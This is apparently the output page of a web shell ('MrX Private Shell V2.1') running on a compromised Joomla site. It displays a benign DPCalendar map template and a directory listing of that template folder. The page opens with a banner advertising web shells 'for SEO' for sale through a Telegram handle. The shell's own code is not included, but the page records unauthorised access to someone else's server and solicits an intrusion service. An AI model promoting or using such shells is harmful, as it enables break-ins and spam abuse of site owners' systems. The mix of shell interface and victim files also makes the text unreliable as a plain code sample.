__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package DPCalendar
* @copyright Copyright (C) 2019 Digital Peak GmbH. <https://www.digital-peak.com>
* @license https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
*/
defined('_JEXEC') or die();
if (!$this->params->get('location_form_show_map', 1) || $this->params->get('map_provider', 'openstreetmap') == 'none') {
return;
}
?>
<div class="com-dpcalendar-locationform__map dp-map"
style="width: <?php echo $this->params->get('location_form_map_width', '100%'); ?>; height: <?php echo $this->params->get('location_form_map_height', '250px'); ?>"
data-zoom="<?php echo $this->params->get('location_form_map_zoom', 10); ?>"
data-latitude="<?php echo $this->params->get('location_form_map_latitude', 47); ?>"
data-longitude="<?php echo $this->params->get('location_form_map_longitude', 4); ?>"
data-ask-consent="<?php echo $this->params->get('map_ask_consent'); ?>">
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 2 KB | 0664 |
|
| default.xml | File | 6 KB | 0664 |
|
| default_actions.php | File | 833 B | 0664 |
|
| default_fields.php | File | 1.05 KB | 0664 |
|
| default_flat_fields.php | File | 651 B | 0664 |
|
| default_heading.php | File | 446 B | 0664 |
|
| default_map.php | File | 902 B | 0664 |
|
| default_tabbed_fields.php | File | 1.08 KB | 0664 |
|